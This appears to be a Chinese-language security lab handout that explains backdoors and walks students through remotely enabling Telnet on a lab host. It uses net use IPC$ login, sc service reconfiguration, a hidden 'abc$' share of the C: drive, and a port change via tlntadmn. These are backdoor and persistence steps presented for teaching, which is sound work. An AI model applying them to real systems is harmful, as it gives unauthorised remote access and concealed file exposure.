（一）實驗簡介

實驗所屬系列：網路攻防工具

實驗物件： 本科/專科資訊保安專業

相關課程及專業：資訊網路安全概論、計算機網路

實驗時數（學分）：2學時

實驗類別：實踐實驗類

（二）實驗目的

1、掌握Telnet服務的原理；

2、掌握Telnet服務的工作過程。

（三）預備知識

後門是攻擊者在入侵了計算機以後為了以後能方便的進入該計算機而進行的系統設定或安裝的一類軟體，一般是指那些繞過安全性控制而獲取對程式或系統訪問權的程式或方法，要求有很強的隱蔽性。其用途在於潛伏在電腦中，從事蒐集資訊或便於黑客進入的動作，它是一種登入系統的方法，不僅繞過系統已有的安全設定，而且還能挫敗系統上各種增強的安全設定。簡單的後門可能只是建立一個新的賬號，或者接管一個很少使用的賬號；複雜的後門利用系統服務或其他工具，可能會繞過系統的安全認證而對系統有安全存取權。

該實驗主要針對如何開啟Telnet服務。

Telnet協議是Internet遠端登入服務的標準協議和主要方式。它為使用者提供了在本地計算機上完成遠端主機工作的能力。在終端使用者的電腦上使用Telnet程式，用它連線到伺服器。終端使用者可以在Telnet程式中輸入命令，這些命令會在伺服器上執行，就像直接在伺服器的控制檯上輸入一樣。可以在本地就能控制伺服器。要開始一個Telnet會話，必須輸入使用者名稱和密碼來登入伺服器。Telnet是常用的遠端控制Web伺服器的方法。

（四）實驗環境

（五）實驗步驟

本地開啟Telnet服務

進入主機A，右鍵“我的電腦”->管理->服務和應用程式->服務，找到Telnet服務，雙擊，將啟動型別改為“手動”

點選啟動後，可看到Telnet的屬性已被修改

遠端開啟Telnet服務

（1）在主機B的“控制面板-工具-資料夾選項-檢視-簡單的檔案共享”去掉選取。

（2）右鍵“我的電腦”->管理->服務和應用程式->服務，找到Telnet服務，關閉.

（3）回到主機A用net use命令建立ipc$連線

命令：net use \\10.1.1.119\ipc$ "主機B的密碼" /user:administrator

（4）用sc命令把禁用的telnet服務變成自動

命令：sc \\10.1.1.119 config tlntsvr start= auto

（5）在主機B上可以檢視telnet的啟動型別已經變為自動：

（6）用sc命令將telnet啟動

命令：sc \\10.1.1.119 start tlntsvr

在主機B上可以檢視telnet服務已經啟動

（7）新建一個cmd環境進行telnet登入：telnet 10.1.1.119

telnet連線建立之後，可輸入使用者名稱密碼等相關資訊進行登入，telnet服務登入到遠端主機：

（8）登入後便可進行共享等相關操作，net share建立c$共享

命令：net share abc$=c:

檢視共享目錄：net share

（9）遠端更改telnet埠

輸入tlntadmn \\10.1.1.119 config port=1000 -u administrator -p 主機B的密碼

再次進行telnet連線，則使用埠1000。